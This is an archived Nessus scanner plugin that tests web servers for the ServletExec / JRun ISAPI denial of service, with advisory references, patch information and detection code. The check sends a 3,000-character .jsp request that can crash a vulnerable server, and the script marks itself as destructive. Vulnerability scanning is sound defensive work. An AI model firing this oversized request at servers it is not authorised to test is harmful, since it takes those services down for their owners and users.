home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / modules / nessus-2.2.8.mo / usr / lib / nessus / plugins / servletExec_DoS.nasl < prev    next >
Text File  |  2005-03-31  |  2KB  |  85 lines

  1. #
  2. # This script was written by Matt Moore <matt.moore@westpoint.ltd.uk>
  3. #
  4. # Script audit and contributions from Carmichael Security <http://www.carmichaelsecurity.com>
  5. #      Erik Anderson <eanders@carmichaelsecurity.com>
  6. #      Wrong BugtraqID(6122). Changed to BID:4796. Added CAN.
  7. #
  8. # See the Nessus Scripts License for details
  9. #
  10.  
  11. if(description)
  12. {
  13.  script_id(10958);
  14.  script_bugtraq_id(1570, 4796);
  15.  script_cve_id("CAN-2002-0894", "CVE-2000-0681");
  16.  script_version ("$Revision: 1.11 $");
  17.  name["english"] = "ServletExec 4.1 / JRun ISAPI DoS";
  18.  name["francais"] = "ServletExec 4.1 / JRun ISAPI DoS";
  19.  script_name(english:name["english"], francais:name["francais"]);
  20.  
  21.  desc["english"] = "
  22. By sending an overly long request for a .jsp file it is 
  23. possible to crash the remote web server.
  24.  
  25. This problem is known as the ServletExec / JRun ISAPI DoS.
  26.  
  27. Solution for ServletExec: 
  28. Download patch #9 from ftp://ftp.newatlanta.com/public/4_1/patches/
  29.  
  30. References: 
  31.  
  32. www.westpoint.ltd.uk/advisories/wp-02-0006.txt
  33. http://online.securityfocus.com/bid/6122
  34.  
  35. Risk factor : High";
  36.  
  37.  script_description(english:desc["english"]);
  38.  
  39.  summary["english"] = "Tests for ServletExec 4.1 ISAPI DoS";
  40.  
  41.  script_summary(english:summary["english"]);
  42.  
  43.  script_category(ACT_DESTRUCTIVE_ATTACK);
  44.  
  45.  script_copyright(english:"This script is Copyright (C) 2002 Matt Moore",
  46.         francais:"Ce script est Copyright (C) 2002 Matt Moore");
  47.  family["english"] = "CGI abuses";
  48.  family["francais"] = "Abus de CGI";
  49.  script_family(english:family["english"], francais:family["francais"]);
  50.  script_dependencie("find_service.nes", "no404.nasl", "www_too_long_url.nasl");
  51.  script_require_ports("Services/www", 80);
  52.  script_exclude_keys("www/too_long_url_crash");
  53.  exit(0);
  54. }
  55.  
  56. # Check starts here
  57.  
  58. include("http_func.inc");
  59. crashes_already = get_kb_item("www/too_long_url_crash");
  60. if(crashes_already)exit(0);
  61.  
  62. port = get_http_port(default:80);
  63.  
  64. if(get_port_state(port))
  65.  banner = get_http_banner(port:port);
  66.  if ( ! banner ) exit(0);
  67.  if ( "JRun" >!<  banner ) exit(0);
  68.  
  69.  buff = string("/", crap(3000), ".jsp");
  70.  
  71.  req = http_get(item:buff, port:port);
  72.           
  73.  soc = http_open_socket(port);
  74.  if(soc)
  75.  {
  76.  send(socket:soc, data:req);
  77.  r = http_recv(socket:soc);
  78.  if (!r)
  79.     security_hole(port);
  80.  
  81.  }
  82. }
  83.  
  84.